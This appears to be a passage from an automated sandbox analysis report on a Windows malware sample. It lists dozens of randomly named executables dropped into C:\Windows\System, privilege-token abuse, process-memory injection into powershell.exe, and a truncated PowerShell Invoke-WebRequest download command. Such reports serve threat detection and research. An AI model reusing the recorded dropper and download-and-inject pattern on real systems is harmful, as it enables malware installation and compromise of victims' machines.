File created C:\Windows\System\ahBeami.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\nMUSUks.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\XWqxAnX.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\pcdHrho.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\TszuJil.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\wXtmuZq.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\ibIzeHP.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\RQgtqrU.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\xmPoAUl.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\tYLuvmR.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\lKPdfWo.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\YUZTddk.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\BLoSFRb.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\JZwqMcd.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\XFmMtoh.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\AlusgRB.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\GkfnTFd.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\ifxodrv.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\rQhGdbJ.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\RTEhPbv.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\vhnoHRN.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\wCYfJXG.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\iiERXLw.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1960 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1960 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1960 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1960 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\IQFfCth.exe
PID 1960 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\IQFfCth.exe
PID 1960 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\IQFfCth.exe
PID 1960 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\jsGJPoJ.exe
PID 1960 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\jsGJPoJ.exe
PID 1960 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\jsGJPoJ.exe
PID 1960 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\dRthmix.exe
PID 1960 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\dRthmix.exe
PID 1960 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\dRthmix.exe
PID 1960 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\VFePrpe.exe
PID 1960 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\VFePrpe.exe
PID 1960 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\VFePrpe.exe
PID 1960 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\wsVwhZx.exe
PID 1960 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\wsVwhZx.exe
PID 1960 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\wsVwhZx.exe
PID 1960 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\IlXXiFS.exe
PID 1960 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\IlXXiFS.exe
PID 1960 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\IlXXiFS.exe
PID 1960 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\UWrullI.exe
PID 1960 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\UWrullI.exe
PID 1960 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\UWrullI.exe
PID 1960 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\yHJffaT.exe
PID 1960 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\yHJffaT.exe
PID 1960 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\yHJffaT.exe
PID 1960 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\onNIwkp.exe
PID 1960 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\onNIwkp.exe
PID 1960 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\onNIwkp.exe
PID 1960 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\nLlrHaS.exe
PID 1960 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\nLlrHaS.exe
PID 1960 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\nLlrHaS.exe
PID 1960 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\CQeSpfA.exe
PID 1960 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\CQeSpfA.exe
PID 1960 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\CQeSpfA.exe
PID 1960 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\LQWCntI.exe
PID 1960 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\LQWCntI.exe
PID 1960 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\LQWCntI.exe
PID 1960 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\LaBKhzw.exe
PID 1960 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\LaBKhzw.exe
PID 1960 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\LaBKhzw.exe
PID 1960 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\ydKZEUK.exe
PID 1960 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\ydKZEUK.exe
PID 1960 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\ydKZEUK.exe
PID 1960 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\TVUgmGi.exe
PID 1960 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\TVUgmGi.exe
PID 1960 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\TVUgmGi.exe
PID 1960 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\jLuZyni.exe
PID 1960 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\jLuZyni.exe
PID 1960 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\jLuZyni.exe
PID 1960 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\BHZkard.exe
PID 1960 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\BHZkard.exe
PID 1960 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\BHZkard.exe
PID 1960 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\srKygpS.exe
PID 1960 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\srKygpS.exe
PID 1960 wrote to memory of 108 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\srKygpS.exe
PID 1960 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\rYtkDvr.exe
PID 1960 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\rYtkDvr.exe
PID 1960 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\rYtkDvr.exe
PID 1960 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\xqNueVZ.exe
PID 1960 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\xqNueVZ.exe
PID 1960 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\xqNueVZ.exe
PID 1960 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\ycDwHFp.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\IQFfCth.exe

C:\Windows\System\IQFfCth.exe

C:\Windows\System\jsGJPoJ.exe

C:\Windows\System\jsGJPoJ.exe

C:\Windows\System\dRthmix.exe

C:\Windows\System\dRthmix.exe

C:\Windows\System\VFePrpe.exe

C:\Windows\System\VFePrpe.exe

C:\Windows\System\wsVwhZx.exe

C:\Windows\System\wsVwhZx.exe

C:\Windows\System\IlXXiFS.exe

C:\Windows\System\IlXXiFS.exe

C:\Windows\System\UWrullI.exe

C:\Windows\System\UWrullI.exe

C:\Windows\System\yHJffaT.exe

C:\Windows\System\yHJffaT.exe

C:\Windows\System\onNIwkp.exe

C:\Windows\System\onNIwkp.exe

C:\Windows\System\nLlrHaS.exe

C:\Windows\System\nLlrHaS.exe

C:\Windows\System\CQeSpfA.exe

C:\Windows\System\CQeSpfA.exe

C:\Windows\System\LQWCntI.exe

C:\Windows\System\LQWCntI.exe

C:\Windows\System\LaBKhzw.exe

C:\Windows\System\LaBKhzw.exe

C:\Windows\System\ydKZEUK.exe

C:\Windows\System\ydKZEUK.exe

C:\Windows\System\TVUgmGi.exe

C:\Windows\System\TVUgmGi.exe

C:\Windows\System\jLuZyni.exe

C:\Windows\System\jLuZyni.exe

C:\Windows\System\BHZkard.exe

C:\Windows\System\BHZkard.exe

C:\Windows\System\srKygpS.exe

C:\Windows\System\srKygpS.exe

C:\Windows\System\rYtkDvr.exe

C:\Windows\System\rYtkDvr.exe

C:\Windows\System\xqNueVZ.exe

C:\Windows\System\xqNueVZ.exe

C:\Windows\System\ycDwHFp.exe

C:\Windows\System\ycDwHFp.exe

C:\Windows\System\uoFQlRv.exe

C:\Windows\System\uoFQlRv.exe

C:\Windows\System\HMHAgcj.exe

C:\Windows\System\HMHAgcj.exe

C:\Windows\System\GyZTFQx.exe

C:\Windows\System\GyZTFQx.exe

C:\Windows\System\QkVyFyb.exe

C:\Windows\System\QkVyFyb.exe

C:\Windows\System\SKObWWE.exe

C:\Windows\System\SKObWWE.exe

C:\Windows\System\RsYOGdF.exe

C:\Windows\System\RsYOGdF.exe

C:\Windows\System\glmuLZG.exe

C:\Windows\System\glmuLZG.exe

C:\Windows\System\DSvJLfo.exe

C:\Windows\System\DSvJLfo.exe

C:\Windows\System\pQBnhmq.exe

C:\Windows\System\pQBnhmq.exe

C:\Windows\System\LUoxmgL.exe

C:\Windows\System\LUoxmgL.exe

C:\Windows\System\geEXswD.exe

C:\Windows\System\geEXswD.exe

C:\Windows\System\gxqIXbk.exe

C:\Windows\System\gxqIXbk.exe

C:\Windows\System\mHJgwgC.exe

C:\Windows\System\mHJgwgC.exe

C:\Windows\System\lgeqSIa.exe

C:\Windows\System\lgeqSIa.exe

C:\Windows\System\ScvXigm.exe

C:\Windows\System\ScvXigm.exe

C:\Windows\System\kZNzntD.exe

C:\Windows\System\kZNzntD.exe

C:\Windows\System\QoHGlYR.exe

C:\Windows\System\QoHGlYR.exe

C:\Windows\System\xznFXir.exe

C:\Windows\System\xznFXir.exe

C:\Windows\System\kdtEmjx.exe

C:\Windows\System\kdtEmjx.exe

C:\Windows\System\ZTZAJFH.exe

C:\Windows\System\ZTZAJFH.exe

C:\Windows\System\DtBLSHv.exe

C:\Windows\System\DtBLSHv.exe

C:\Windows\System\ReeOOlu.exe

C:\Windows\System\ReeOOlu.exe

C:\Windows\System\leFjYMA.exe

C:\Windows\System\leFjYMA.exe

C:\Windows\System\VPXMlkt.exe

C:\Windows\System\VPXMlkt.exe

C:\Windows\System\GhwdndH.exe

C:\Windows\System\GhwdndH.exe

C:\Windows\System\bDwRWIN.exe

C:\Windows\System\bDwRWIN.exe

C:\Windows\System\txGCBbC.exe

C:\Windows\System\txGCBbC.exe

C:\Windows\System\ngcQWFK.exe

C:\Windows\System\ngcQWFK.exe

C:\Windows\System\udqXNOw.exe

C:\Windows\System\udqXNOw.exe

C:\Windows\System\XMkfgGK.exe

C:\Windows\System\XMkfgGK.exe

C:\Windows\System\tCciNBj.exe

C:\Windows\System\tCciNBj.exe

C:\Windows\System\EPwuAGi.exe

C:\Windows\System\EPwuAGi.exe

C:\Windows\System\jODivET.exe

C:\Windows\System\jODivET.exe

C:\Windows\System\qPcxKLr.exe

C:\Windows\System\qPcxKLr.exe

C:\Windows\System\GXCOoej.exe

C:\Windows\System\GXCOoej.exe

C:\Windows\System\xMxRYbM.exe

C:\Windows\System\xMxRYbM.exe

C:\Windows\System\vnLqjoH.exe

C:\Windows\System\vnLqjoH.exe

C:\Windows\System\OeoYgEa.exe

C:\Windows\System\OeoYgEa.exe

C:\Windows\System\RMqnZkd.exe

C:\Windows\System\RMqnZkd.exe

C:\Windows\System\nmllLwd.exe

C:\Windows\System\nmllLwd.exe

C:\Windows\System\QexJLhA.exe

C:\Windows\System\QexJLhA.exe

C:\Windows\System\JZSlpyC.exe

C:\Windows\System\JZSlpyC.exe

C:\Windows\System\cFxuvpP.exe

C:\Windows\System\cFxuvpP.exe

C:\Windows\System\gmLHvtC.exe

C:\Windows\System\gmLHvtC.exe

C:\Windows\System\QJuHDhg.exe

C:\Windows\System\QJuHDhg.exe

C:\Windows\System\gvSjgmV.exe

C:\Windows\System\gvSjgmV.exe

C:\Windows\System\TgDCjBZ.exe

C:\Windows\System\TgDCjBZ.exe

C:\Windows\System\NiLVBQl.exe

C:\Windows\System\NiLVBQl.exe

C:\Windows\System\TPzgCkS.exe

C:\Windows\System\TPzgCkS.exe

C:\Windows\System\pzxzWjr.exe

C:\Windows\System\pzxzWjr.exe

C:\Windows\System\aoKjgkL.exe

C:\Windows\System\aoKjgkL.exe

C:\Windows\System\oEykGIM.exe

C:\Windows\System\oEykGIM.exe

C:\Windows\System\aUWtOPm.exe

C:\Windows\System\aUWtOPm.exe

C:\Windows\System\iPARKUU.exe

C:\Windows\System\iPARKUU.exe

C:\Windows\System\hEYnvmd.exe

C:\Windows\System\hEYnvmd.exe

C:\Windows\System\ZIkBaaQ.exe

C:\Windows\System\ZIkBaaQ.exe

C:\Windows\System\AiHetrL.exe

C:\Windows\System\AiHetrL.exe

C:\Windows\System\afmYDJZ.exe

C:\Windows\System\afmYDJZ.exe

C:\Windows\System\CHmTDVF.exe

C:\Windows\System\CHmTDVF.exe

C:\Windows\System\WOBMGQb.exe

C:\Windows\System\WOBMGQb.exe

C:\Windows\System\tCWtqhw.exe

C:\Windows\System\tCWtqhw.exe

C:\Windows\System\PCUwNTo.exe

C:\Windows\System\PCUwNTo.exe

C:\Windows\System\yodzTwO.exe

C:\Windows\System\yodzTwO.exe

C:\Windows\System\aPgwcBi.exe

C:\Windows\System\aPgwcBi.exe

C:\Windows\System\yHTdZer.exe

C:\Windows\System\yHTdZer.exe

C:\Windows\System\OTzuCYO.exe

C:\Windows\System\OTzuCYO.exe

C:\Windows\System\RkGwYhr.exe

C:\Windows\System\RkGwYhr.exe

C:\Windows\System\OfYvwgb.exe

C:\Windows\System\OfYvwgb.exe

C:\Windows\System\xNorgOb.exe

C:\Windows\System\xNorgOb.exe

C:\Windows\System\BqLXlGt.exe

C:\Windows\System\BqLXlGt.exe

C:\Windows\System\bXPUHhv.exe

C:\Windows\System\bXPUHhv.exe

C:\Windows\System\QVxeqQh.exe

C:\Windows\System\QVxeqQh.exe

C:\Windows\System\xuFdODw.exe

C:\Windows\System\xuFdODw.exe

C:\Windows\System\vfkxuVN.exe

C:\Windows\System\vfkxuVN.exe

C:\Windows\System\OnLMCCy.exe

C:\Windows\System\OnLMCCy.exe

C:\Windows\System\YbVqNTr.exe

C:\Windows\System\YbVqNTr.exe

C:\Windows\System\xhOaOLk.exe

C:\Windows\System\xhOaOLk.exe

C:\Windows\System\ZvNoned.exe

C:\Windows\System\ZvNoned.exe

C:\Windows\System\IsMkypb.exe

C:\Windows\System\IsMkypb.exe

C:\Windows\System\YCnZnUg.exe

C:\Windows\System\YCnZnUg.exe

C:\Windows\System\mOIZehH.exe

C:\Windows\System\mOIZehH.exe

C:\Windows\System\vSbmTfV.exe

C:\Windows\System\vSbmTfV.exe

C:\Windows\System\ZqDnlkw.exe

C:\Windows\System\ZqDnlkw.exe

C:\Windows\System\YKYtrzS.exe

C:\Windows\System\YKYtrzS.exe

C:\Windows\System\BsGmAkX.exe

C:\Windows\System\BsGmAkX.exe

C:\Windows\System\MUEWOjz.exe

C:\Windows\System\MUEWOjz.exe

C:\Windows\System\Asjhrbo.exe

C:\Windows\System\Asjhrbo.exe

C:\Windows\System\jGPrclg.exe

C:\Windows\System\jGPrclg.exe

C:\Windows\System\aMsereD.exe

C:\Windows\System\aMsereD.exe

C:\Windows\System\ClDjMgd.exe

C:\Windows\System\ClDjMgd.exe

C:\Windows\System\XzVlvwp.exe

C:\Windows\System\XzVlvwp.exe

C:\Windows\System\AOgqfPh.exe

C:\Windows\System\AOgqfPh.exe

C:\Windows\System\kJbNtvA.exe

C:\Windows\System\kJbNtvA.exe

C:\Windows\System\ELRnwwd.exe

C:\Windows\System\ELRnwwd.exe

C:\Windows\System\SARpatq.exe

C:\Windows\System\SARpatq.exe

C:\Windows\System\TkoXRFo.exe

C:\Windows\System\TkoXRFo.exe

C:\Windows\System\iiRmEOA.exe

C:\Windows\System\iiRmEOA.exe

C:\Windows\System\PEvzLqW.exe

C:\Windows\System\PEvzLqW.exe

C:\Windows\System\vCwZyAk.exe

C:\Windows\System\vCwZyAk.exe

C:\Windows\System\iFboigo.exe

C:\Windows\System\iFboigo.exe

C:\Windows\System\ZlUqtwP.exe

C:\Windows\System\ZlUqtwP.exe

C:\Windows\System\drjykRK.exe

C:\Windows\System\drjykRK.exe

C:\Windows\System\bkuGNPS.exe

C:\Windows\System\bkuGNPS.exe

C:\Windows\System\ZWZNwKh.exe

C:\Windows\System\ZWZNwKh.exe

C:\Windows\System\BiEjPcF.exe

C:\Windows\System\BiEjPcF.exe

C:\Windows\System\NQqbmcS.exe

C:\Windows\System\NQqbmcS.exe

C:\Windows\System\RwrBhzj.exe

C:\Windows\System\RwrBhzj.exe

C:\Windows\System\EQrsCyr.exe

C:\Windows\System\EQrsCyr.exe

C:\Windows\System\wcdYHWY.exe

C:\Windows\System\wcdYHWY.exe

C:\Windows\System\hPvQiuC.exe

C:\Windows\System\hPvQiuC.exe

C:\Windows\System\ZrNtAGU.exe

C:\Windows\System\ZrNtAGU.exe

C:\Windows\System\dyMfFrb.exe

C:\Windows\System\dyMfFrb.exe

C:\Windows\System\JVoKVeq.exe

C:\Windows\System\JVoKVeq.exe

C:\Windows\System\tkEsGOZ.exe

C:\Windows\System\tkEsGOZ.exe

C:\Windows\System\lvtBtuw.exe

C:\Windows\System\lvtBtuw.exe

C:\Windows\System\AVsqTUv.exe

C:\Windows\System\AVsqTUv.exe

C:\Windows\System\LyqBdHD.exe

C:\Windows\System\LyqBdHD.exe

C:\Windows\System\IQCeSZh.exe

C:\Windows\System\IQCeSZh.exe

C:\Windows\System\LQQpdgt.exe

C:\Windows\System\LQQpdgt.exe

C:\Windows\System\kgJcjlx.exe

C:\Windows\System\kgJcjlx.exe

C:\Windows\System\peOvRCn.exe

C:\Windows\System\peOvRCn.exe

C:\Windows\System\lceYiCu.exe

C:\Windows\System\lceYiCu.exe

C:\Windows\System\sVJkwyg.exe

C:\Windows\System\sVJkwyg.exe

C:\Windows\System\oBtldnf.exe

C:\Windows\System\oBtldnf.exe

C:\Windows\System\MyArEMf.exe

C:\Windows\System\MyArEMf.exe

C:\Windows\System\atCILXd.exe

C:\Windows\System\atCILXd.exe

C:\Windows\System\DeehaVH.exe

C:\Windows\System\DeehaVH.exe

C:\Windows\System\MzAnhQt.exe

C:\Windows\System\MzAnhQt.exe

C:\Windows\System\paJjnUi.exe

C:\Windows\System\paJjnUi.exe

C:\Windows\System\xOglvex.exe

C:\Windows\System\xOglvex.exe

C:\Windows\System\PotWghK.exe

C:\Windows\System\PotWghK.exe

C:\Windows\System\VGguhvS.exe

C:\Windows\System\VGguhvS.exe

C:\Windows\System\bRqcSCA.exe

C:\Windows\System\bRqcSCA.exe

C:\Windows\System\EdCmhhR.exe

C:\Windows\System\EdCmhhR.exe

C:\Windows\System\LNOvyOk.exe

C:\Windows\System\LNOvyOk.exe

C:\Windows\System\PyORNIg.exe

C:\Windows\System\PyORNIg.exe

C:\Windows\System\FtuzOpM.exe

C:\Windows\System\FtuzOpM.exe

C:\Windows\System\XtwRZHC.exe

C:\Windows\System\XtwRZHC.exe

C:\Windows\System\qlVRdwf.exe

C:\Windows\System\qlVRdwf.exe

C:\Windows\System\sslRxlO.exe

C:\Windows\System\sslRxlO.exe

C:\Windows\System\BAGqYKz.exe

C:\Windows\System\BAGqYKz.exe

C:\Windows\System\XoHgvoM.exe

C:\Windows\System\XoHgvoM.exe

C:\Windows\System\izDGooX.exe

C:\Windows\System\izDGooX.exe

C:\Windows\System\DRbxLey.exe

C:\Windows\System\DRbxLey.exe

C:\Windows\System\ZoVlavc.exe

C:\Windows\System\ZoVlavc.exe

C:\Windows\System\uoIEeBX.exe

C:\Windows\System\uoIEeBX.exe

C:\Windows\System\UyMVQoP.exe

C:\Windows\System\UyMVQoP.exe

C:\Windows\System\WhpHWTk.exe

C:\Windows\System\WhpHWTk.exe

C:\Windows\System\htqkXVx.exe

C:\Windows\System\htqkXVx.exe

C:\Windows\System\dcSReTx.exe

C:\Windows\System\dcSReTx.exe

C:\Windows\System\YilrcdH.exe

C:\Windows\System\YilrcdH.exe

C:\Windows\System\UuuokVf.exe

C:\Windows\System\UuuokVf.exe

